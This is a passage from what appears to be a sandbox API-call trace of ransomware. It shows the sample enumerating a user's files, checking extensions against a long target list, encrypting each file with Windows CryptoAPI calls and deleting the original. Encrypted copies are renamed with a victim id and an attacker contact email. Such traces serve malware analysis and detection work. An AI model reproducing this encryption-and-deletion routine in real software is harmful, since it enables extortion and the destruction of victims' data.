ql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0201.549] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.549] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.550] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\1nnjaiktbaoed3bu.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\1nnjaiktbaoed3bu.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0201.550] ReadFile (in: hFile=0x390, lpBuffer=0xfe11a0, nNumberOfBytesToRead=0x4587, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfe11a0*, lpNumberOfBytesRead=0x189930*=0x4587, lpOverlapped=0x0) returned 1
	[0201.553] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.553] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcba18) returned 1
	[0201.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.555] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0201.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.556] CryptHashData (hHash=0xfb90f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0201.556] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.556] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb90f0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb8f30) returned 1
	[0201.556] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.556] CryptEncrypt (in: hKey=0xfb8f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x4587, dwBufLen=0x4587 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x4590) returned 1
	[0201.557] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.557] RtlMoveMemory (in: Destination=0xfe5730, Source=0xfe11a0, Length=0x4587 | out: Destination=0xfe5730) 
	[0201.557] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.557] CryptEncrypt (in: hKey=0xfb8f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe5730*, pdwDataLen=0x1894dc*=0x4587, dwBufLen=0x4590 | out: pbData=0xfe5730*, pdwDataLen=0x1894dc*=0x4590) returned 1
	[0201.557] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.557] CryptDestroyKey (hKey=0xfb8f30) returned 1
	[0201.558] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.558] CryptDestroyHash (hHash=0xfb90f0) returned 1
	[0201.558] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.558] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0201.558] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.558] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.559] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.559] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0201.560] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\1nnjaiktbaoed3bu.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 137
	[0201.560] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\1nnjaiktbaoed3bu.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\1nnjaiktbaoed3bu.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x32c
	[0201.561] WriteFile (in: hFile=0x32c, lpBuffer=0xfe5730*, nNumberOfBytesToWrite=0x4590, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfe5730*, lpNumberOfBytesWritten=0x189938*=0x4590, lpOverlapped=0x0) returned 1
	[0201.565] CloseHandle (hObject=0x32c) returned 1
	[0201.565] CloseHandle (hObject=0x390) returned 1
	[0201.565] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\1nnjaiktbaoed3bu.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\1nnjaiktbaoed3bu.swf")) returned 1
	[0201.571] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\1nnjaiktbaoed3bu.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\1nnjaiktbaoed3bu.swf")) returned 0
	[0201.571] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c9231f0, ftCreationTime.dwHighDateTime=0x1d969a2, ftLastAccessTime.dwLowDateTime=0x1d3baed0, ftLastAccessTime.dwHighDateTime=0x1d96d67, ftLastWriteTime.dwLowDateTime=0x1d3baed0, ftLastWriteTime.dwHighDateTime=0x1d96d67, nFileSizeHigh=0x0, nFileSizeLow=0x123da, dwReserved0=0x0, dwReserved1=0x0, cFileName="7V2v.mp4", cAlternateFileName="")) returned 1
	[0201.571] lstrcmpW (lpString1="7V2v.mp4", lpString2="..") returned 1
	[0201.571] lstrcmpW (lpString1="7V2v.mp4", lpString2=".") returned 1
	[0201.571] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\"
	[0201.571] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\", lpString2="7V2v.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\7V2v.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\7V2v.mp4"
	[0201.571] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\7V2v.mp4") returned 83
	[0201.571] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.572] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\7V2v.mp4", cchLength=0x53 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\7v2v.mp4") returned 0x53
	[0201.572] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.572] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\7v2v.mp4", lpSrch="help_decrypt_your_files") returned 0x0
	[0201.572] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\7v2v.mp4" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\7v2v.mp4") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\7v2v.mp4"
	[0201.572] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\7v2v.mp4") returned 83
	[0201.572] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.573] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.573] StrStrW (lpFirst=".mp4", lpSrch=".") returned=".mp4"
	[0201.573] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.573] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp4") returned=".mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.